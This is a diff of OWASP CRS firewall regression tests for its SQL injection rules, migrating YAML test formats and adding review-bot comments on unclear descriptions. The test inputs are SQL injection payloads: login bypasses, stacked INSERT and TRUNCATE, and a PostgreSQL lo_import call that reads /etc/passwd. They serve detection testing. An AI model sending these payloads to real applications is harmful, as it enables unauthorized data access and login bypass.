"/get/index.php?no=2&id=1%27%20and%20unistr(password)::bool--" + version: HTTP/1.0 + output: + log: + expect_ids: [942320] + - test_id: 7 desc: "Detects PostgreSQL bypass attempt with div(23,-2) - issue #2910" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=div(23,-2)" - version: HTTP/1.0 - output: - log_contains: id "942320" - - test_title: 942320-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=div(23,-2)" + version: HTTP/1.0 + output: + log: + expect_ids: [942320] + - test_id: 8 desc: "Detects PostgreSQL bypass attempt with div (23.23 , 2) - issue #2910" 
stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=div+(23.23+,+2)" - version: HTTP/1.0 - output: - log_contains: id "942320" - - test_title: 942320-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=div+(23.23+,+2)" + version: HTTP/1.0 + output: + log: + expect_ids: [942320] + - test_id: 9 desc: "Detects PostgreSQL bypass attempt lo_import'( - issue #2912" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=lo_import(%27/etc%27%20||%20%27/pass%27%20||%20%27wd%27)" - version: HTTP/1.0 - output: - log_contains: id "942320" - - test_title: 942320-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=lo_import(%27/etc%27%20||%20%27/pass%27%20||%20%27wd%27)" + version: HTTP/1.0 + output: + log: + expect_ids: [942320] + - test_id: 10 desc: "Detects PostgreSQL bypass attempt with lo_get(16400) - issue #2924" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=lo_get(16400)" - version: 
HTTP/1.0 - output: - log_contains: id "942320" - - test_title: 942320-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=lo_get(16400)" + version: HTTP/1.0 + output: + log: + expect_ids: [942320] + - test_id: 11 desc: "Detects PostgreSQL bypass attempt function(foo)::text - issue #2924" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=function(foo)::text" - version: HTTP/1.0 - output: - log_contains: id "942320" - - test_title: 942320-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=function(foo)::text" + version: HTTP/1.0 + output: + log: + expect_ids: [942320] + - test_id: 12 desc: "Detects PostgreSQL bypass attempt function(foo)::bigint - issue #2924" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=function(foo)::bigint" - version: HTTP/1.0 - output: - log_contains: id "942320" - - test_title: 942320-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=function(foo)::bigint" + version: 
HTTP/1.0 + output: + log: + expect_ids: [942320] + - test_id: 13 desc: "Detects PostgreSQL bypass attempt function(foo)::double precision - issue #2924" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=function(foo)::double%20precision" - version: HTTP/1.0 - output: - log_contains: id "942320" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=function(foo)::double%20precision" + version: HTTP/1.0 + output: + log: + expect_ids: [942320] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942321.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942321.yaml index 2ebdb67..5a111a2 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942321.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942321.yaml 
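Review bot: Tests 1–4 all carry the identical desc `Detects MySQL and PostgreSQL stored procedure/function injections` although each exercises a different construct (`procedure analyse (`, `exec (@`, `declare @b`, and `DECLARE/**/@x` with an inline comment standing in for whitespace); a failure report names only the test_id and that shared desc, so the variant under test is invisible. Tests 5–13 already follow the better convention of naming the payload and the issue number, and tests 1–4 should match, e.g. `desc: "procedure analyse ( injection"` and `desc: "DECLARE @x with /**/ in place of whitespace"`. I am inferring from the syntax that the `exec (@` and `declare @` payloads target T-SQL rather than the MySQL/PostgreSQL named in the desc; the rule text is not in this hunk, so verify before wording the descs.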
@@ -1,38 +1,37 @@ --- meta: author: "Franziska Bühler, azurit" - enabled: true - name: 942321.yaml +rule_id: 942321 tests: - - test_title: 942321-1 + - test_id: 1 desc: "Detects MySQL and PostgreSQL stored procedure/function injections" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: encode(lo_get(16200),'base64')::int - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "942321" - - test_title: 942321-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: encode(lo_get(16200),'base64')::int + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [942321] + - test_id: 2 desc: "Detects MySQL and PostgreSQL stored procedure/function injections" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: overlay(password placing $$$$ from 1)::int and id=1 - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "942321" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: overlay(password placing $$$$ from 1)::int and id=1 + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [942321] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942330.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942330.yaml index 6cee8d0..5f3f314 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942330.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942330.yaml 
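Review bot: Both tests copy 942320's desc verbatim, but what makes them 942321 tests rather than 942320 tests is never stated: the payload is carried in the `User-Agent` header instead of ARGS, and the second one uses PostgreSQL dollar quoting (`$$$$`) inside `overlay(... placing ... from ...)::int`. A reader of a failure report cannot tell from the desc why 942321 and not 942320 is the expected id; suggest `desc: "PostgreSQL lo_get()/encode() cast injection in User-Agent header"` and `desc: "PostgreSQL overlay() with dollar-quoted string cast to int, in User-Agent header"`. Whether the target list is what separates the two rules is not visible here and should be confirmed against the rule file.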
@@ -1,94 +1,92 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None - enabled: true - name: 942330.yaml +rule_id: 942330 tests: - - test_title: 942330-1 + - test_id: 1 desc: "classic SQL injection probings 1/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=%22%27&var2=whatever" - version: HTTP/1.0 - output: - log_contains: id "942330" - - test_title: 942330-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=%22%27&var2=whatever" + version: HTTP/1.0 + output: + log: + expect_ids: [942330] + - test_id: 2 desc: "Test first backslash match ([\"'`\x5c]*?)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=\\\"1 or 1-" - version: HTTP/1.0 - output: - log_contains: id "942330" - - test_title: 942330-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=\\\"1 or 1-" + version: HTTP/1.0 + output: + log: + expect_ids: [942330] + - test_id: 3 desc: "Test second backslash match (\x5cx(?:23|27|3d))" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=\\x23" - version: HTTP/1.0 - output: - log_contains: id "942330" - - test_title: 942330-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=\\x23" + version: HTTP/1.0 + output: + log: + expect_ids: [942330] + - test_id: 4 desc: "Test false positive issue nr. 3205" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: | - "var=05111222333 - andy.surname@somedomain.com" - version: HTTP/1.0 - output: - no_log_contains: id "942330" - - test_title: 942330-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: | + "var=05111222333 + andy.surname@somedomain.com" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942330] + - test_id: 5 desc: "Test false positive issue nr. 
3205" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=05111222333 andy.surname@somedomain.com" - version: HTTP/1.0 - output: - no_log_contains: id "942330" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=05111222333 andy.surname@somedomain.com" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942330] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942340.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942340.yaml index 901d8a6..88a871d 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942340.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942340.yaml 
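Review bot: Test 4's body is a YAML literal block scalar, so the double quotes on `"var=05111222333` and `andy.surname@somedomain.com"` are sent as part of the request body (plus a trailing newline), whereas in test 5 the quotes are YAML syntax and are stripped. The two tests therefore differ in more than newline-versus-space: test 4's `var` value begins with a literal `"`, which is precisely the class of character this rule inspects (test 1 fires on `%22%27`), so the file should say whether that is intended. If the intent is only the line break from issue 3205, drop the quotes — `data: |` followed by `  var=05111222333` and `  andy.surname@somedomain.com` — and give the two descs distinguishing suffixes such as `(newline-separated)` and `(space-separated)` instead of the identical `Test false positive issue nr. 3205`.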
@@ -1,191 +1,189 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None - enabled: true - name: 942340.yaml +rule_id: 942340 tests: - - test_title: 942340-1 + - test_id: 1 desc: "basic SQL authentication bypass attempts 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - # in ( select * from - uri: "/get?var=in%20%28%20select%20%2a%20from" - version: HTTP/1.0 - output: - log_contains: id "942340" - - test_title: 942340-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # in ( select * from + uri: "/get?var=in%20%28%20select%20%2a%20from" + version: HTTP/1.0 + output: + log: + expect_ids: [942340] + - test_id: 2 desc: "SQLite authentication bypass with except select" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - # except \tselect.1,2 - uri: "/get?var=except%20%09select.1%2C2" - version: HTTP/1.0 - output: - log_contains: id "942340" - - test_title: 942340-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # except \tselect.1,2 + uri: "/get?var=except%20%09select.1%2C2" + version: HTTP/1.0 + output: + log: + expect_ids: [942340] + - test_id: 3 desc: "SQLite authentication bypass with except values" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: 
localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - # except values (1,2) - uri: "/get?var=except%20values(1%2C2)" - version: HTTP/1.0 - output: - log_contains: id "942340" - - test_title: 942340-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # except values (1,2) + uri: "/get?var=except%20values(1%2C2)" + version: HTTP/1.0 + output: + log: + expect_ids: [942340] + - test_id: 4 desc: "true-negative except selecting" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - # except selecting - uri: "/get?var=except%20selecting" - version: HTTP/1.0 - output: - no_log_contains: id "942340" - - test_title: 942340-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # except selecting + uri: "/get?var=except%20selecting" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942340] + - test_id: 5 desc: "basic SQL authentication bypass attempts 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=x'%20or%20array[id]%20is%20not%20null--" - version: HTTP/1.0 - output: - log_contains: id "942340" - - test_title: 942340-6 + - input: + dest_addr: 
127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=x'%20or%20array[id]%20is%20not%20null--" + version: HTTP/1.0 + output: + log: + expect_ids: [942340] + - test_id: 6 desc: "basic SQL authentication bypass attempts 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=x'%20or%20email~all(array[email]);analyze--" - version: HTTP/1.0 - output: - log_contains: id "942340" - - test_title: 942340-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=x'%20or%20email~all(array[email]);analyze--" + version: HTTP/1.0 + output: + log: + expect_ids: [942340] + - test_id: 7 desc: "basic SQL authentication bypass attempts 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email='%20and%20email%20not%20similar%20to%20id--" - version: HTTP/1.0 - output: - log_contains: id "942340" - - test_title: 942340-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email='%20and%20email%20not%20similar%20to%20id--" + version: 
HTTP/1.0 + output: + log: + expect_ids: [942340] + - test_id: 8 desc: "basic SQL authentication bypass attempts 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email='%20or%20true;%20foo" - version: HTTP/1.0 - output: - log_contains: id "942340" - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email='%20or%20false;%20foo" - version: HTTP/1.0 - output: - log_contains: id "942340" - - test_title: 942340-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email='%20or%20true;%20foo" + version: HTTP/1.0 + output: + log: + expect_ids: [942340] + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email='%20or%20false;%20foo" + version: HTTP/1.0 + output: + log: + expect_ids: [942340] + - test_id: 9 desc: "basic SQL authentication bypass attempts 3/3 (no whitespace between operator)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email='||true" - version: HTTP/1.0 - output: - log_contains: id 
"942340" - - test_title: 942340-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email='||true" + version: HTTP/1.0 + output: + log: + expect_ids: [942340] + - test_id: 10 desc: "SQL Auth Bypass FP test (invalid operator without whitespace)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email='ortrue" - version: HTTP/1.0 - output: - no_log_contains: id "942340" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email='ortrue" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942340] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942350.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942350.yaml index 23246f0..7934f55 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942350.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942350.yaml 
@@ -1,74 +1,72 @@ --- meta: author: "Christian S.J. Peron, Franziska Bühler, azurit" - description: None - enabled: true - name: 942350.yaml +rule_id: 942350 tests: - - test_title: 942350-1 + - test_id: 1 desc: "MySQL UDF injection and other data/structure manipulation" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - # ; insert INTO table (word) VALUES('dfsd') - uri: "/get?var=%3bINSERT%20INTO%20table%20%28col%29%20VALUES" - version: HTTP/1.0 - output: - log_contains: id "942350" - - test_title: 942350-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # ; insert INTO table (word) VALUES('dfsd') + uri: "/get?var=%3bINSERT%20INTO%20table%20%28col%29%20VALUES" + version: HTTP/1.0 + output: + log: + expect_ids: [942350] + - test_id: 2 desc: "Fix for FP reported in GitHub issue 1587" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - # ;insertion_424242 - uri: "/get?var=%3Binsertion_424242" - version: HTTP/1.0 - output: - no_log_contains: id "942350" - - test_title: 942350-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # ;insertion_424242 + uri: "/get?var=%3Binsertion_424242" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942350] + - test_id: 3 desc: "MySQL create function injection" 
stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - # CREATE FUNCTION hello (s CHAR(20)) RETURNS CHAR(50) DETERMINISTIC RETURN CONCAT('Hello, ',s,'!'); - uri: "/get?var=CREATE+FUNCTION+hello+%28s+CHAR%2820%29%29+RETURNS+CHAR%2850%29+DETERMINISTIC+RETURN+CONCAT%28%27Hello%2C+%27%2Cs%2C%27%21%27%29%3B" - version: HTTP/1.0 - output: - log_contains: id "942350" - - test_title: 942350-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # CREATE FUNCTION hello (s CHAR(20)) RETURNS CHAR(50) DETERMINISTIC RETURN CONCAT('Hello, ',s,'!'); + uri: "/get?var=CREATE+FUNCTION+hello+%28s+CHAR%2820%29%29+RETURNS+CHAR%2850%29+DETERMINISTIC+RETURN+CONCAT%28%27Hello%2C+%27%2Cs%2C%27%21%27%29%3B" + version: HTTP/1.0 + output: + log: + expect_ids: [942350] + - test_id: 4 desc: "Status Page Test - MySQL injection with ;truncate[xx" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?test=;truncate[xx" - version: HTTP/1.0 - output: - log_contains: id "942350" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?test=;truncate[xx" + version: HTTP/1.0 + output: + log: + expect_ids: [942350] 
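Review bot: The explanatory comment kept above test 1's URI, `# ; insert INTO table (word) VALUES('dfsd')`, no longer describes the request it sits on: `%3bINSERT%20INTO%20table%20%28col%29%20VALUES` decodes to `;INSERT INTO table (col) VALUES`, with `col` rather than `word` and no `('dfsd')` literal. These comments are the only decoded view a reader gets of the percent-encoded payload, so it should be brought in line, e.g. `# ;INSERT INTO table (col) VALUES`. Test 3's comment, by contrast, matches its URI character for character and is the pattern to follow.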
diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942360.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942360.yaml
index 860b3b9..3631ba1 100644
--- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942360.yaml
+++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942360.yaml
@@ -1,671 +1,669 @@ --- meta: author: "Christian S.J. Peron, Christoph Hansen, Franziska Buehler, azurit" - description: None - enabled: true - name: 942360.yaml +rule_id: 942360 tests: - - test_title: 942360-1 + - test_id: 1 desc: "concatenated basic SQL injection and SQLLFI" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # 23423 as "sdfsdfs" FROM table - data: "var=1234%20AS%20%22foobar%22%20FROM%20tablevar2=whatever" - version: HTTP/1.0 - output: - log_contains: id "942360" - - test_title: 942360-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # 23423 as "sdfsdfs" FROM table + data: "var=1234%20AS%20%22foobar%22%20FROM%20tablevar2=whatever" + version: HTTP/1.0 + output: + log: + expect_ids: [942360] 